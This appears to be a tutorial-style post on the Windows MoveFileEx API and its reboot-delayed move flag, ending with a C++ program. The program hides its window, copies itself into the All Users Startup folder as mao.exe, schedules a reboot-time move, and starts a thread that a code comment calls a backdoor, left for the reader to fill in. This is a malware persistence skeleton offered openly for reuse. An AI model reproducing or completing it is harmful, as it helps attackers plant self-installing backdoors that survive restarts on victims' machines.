1. Learn more about MoveFileEx
MoveFileEx is an extended version of MoveFile. It also moves files, but it offers some additional options. The MoveFileEx function is prototyped as follows:
BOOL MoveFileEx(
    LPCTSTR lpExistingFileName,
    LPCTSTR lpNewFileName,
    DWORD   dwFlags
);
The first parameter is the name of the file to move, the second is the destination name, and the last parameter selects how the move is performed.
Look more closely at the values the last parameter can take. One of them is MOVEFILE_DELAY_UNTIL_REBOOT, which MSDN describes as follows:
The function does not move the file until the operating system is restarted. The system moves the file immediately after AUTOCHK is executed, but before creating any paging files. Consequently, this parameter enables the function to delete paging files from previous startups.
This flag can only be used if the process is in the context of a user who belongs to the Administrators group or the LocalSystem account.
This flag cannot be used with the MOVEFILE_COPY_ALLOWED flag.
When dwFlags is set to MOVEFILE_DELAY_UNTIL_REBOOT, the function does not move the file until the system restarts. Note that the move happens after AUTOCHK runs and before the page file is created. At that point the user has not fully entered the operating system, so this can be used to delete files that are hard to delete under normal conditions, even page files.
When lpNewFileName is NULL, MoveFileEx performs a delete instead of a move. Many anti-virus products and some malware-removal tools use this feature of MoveFileEx to delete viruses after a reboot.
MOVEFILE_DELAY_UNTIL_REBOOT requires that the process run in the context of an Administrator or the LocalSystem account.
The MOVEFILE_DELAY_UNTIL_REBOOT flag cannot be combined with MOVEFILE_COPY_ALLOWED. A plain move cannot cross volumes; when MOVEFILE_COPY_ALLOWED is set, the function simulates the move with CopyFile followed by DeleteFile. A running program cannot be moved to a different volume (partition) this way: only the CopyFile step succeeds, and because the subsequent DeleteFile fails, the running program is not removed.
When dwFlags is set to MOVEFILE_DELAY_UNTIL_REBOOT, MoveFileEx records the file to move and its destination as a multi-string registry value (REG_MULTI_SZ) under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations, and the move is performed at the next restart.
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#pragma comment(linker, "/subsystem:windows")

DWORD WINAPI StartShell(LPVOID lpParam);

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
    // Build the destination path in the All Users Startup folder on the system drive
    char szPath[MAX_PATH] = { 0 };
    ::GetSystemDirectory(szPath, MAX_PATH);
    char szDst[MAX_PATH] = { 0 };
    for (int i = 0; i < 3; i++)          // copy the drive letter, e.g. "C:\"
        szDst[i] = szPath[i];
    strcat(szDst, "Documents and Settings\\All Users\\Start Menu\\Program\\Start\\mao.exe");

    TCHAR szTmp[MAX_PATH] = { 0 };
    if (!GetModuleFileName(NULL, szTmp, sizeof(szTmp)))
    {
        return 0;
    }
    int r;
    r = strcmp(szTmp, szDst);
    if (!r)                              // already running from the destination path
    {
        goto Stop;
    }
    if (!CopyFile(szTmp, szDst, FALSE))
    {
        return 0;
    }
Stop:
    //printf("\n\tCurrent directory is %s\n", szDst);
    // Get the current program name
    TCHAR szCurPath[MAX_PATH];
    memset(szCurPath, 0, sizeof(szCurPath));
    GetModuleFileName(NULL, szCurPath, sizeof(szCurPath) / sizeof(TCHAR));
    if (!(MoveFileEx(szCurPath, "C:\\Windows\\FK.bak", MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED)))  // COPY_ALLOWED is required when moving across volumes
        ::MessageBox(NULL, "Failed to move the file for the first time", "Test", MB_OK);
    if (!::MoveFileEx("C:\\Windows\\FK.bak", szDst, MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING))
    {
        ::MessageBox(NULL, "An error occurred while moving the file.", "Test", MB_OK);
    }
    else printf("Task completed\n");
    /* system("pause"); */
    // Create and wait for the thread
    // StartShell is a backdoor thread function; implement the corresponding functionality yourself.
    HANDLE hThread = ::CreateThread(NULL, 0, StartShell, NULL, 0, NULL);
    ::MessageBox(NULL, "Haha.", "Test", MB_OK);
    ::WaitForSingleObject(hThread, INFINITE);   // wait before closing the handle
    CloseHandle(hThread);
    return 0;
}

DWORD WINAPI StartShell(LPVOID lpParam)
{
    ::MessageBox(NULL, "Haha.", "Test", MB_OK);
    return 0;
}
/Files/tt_mc/movefile.rar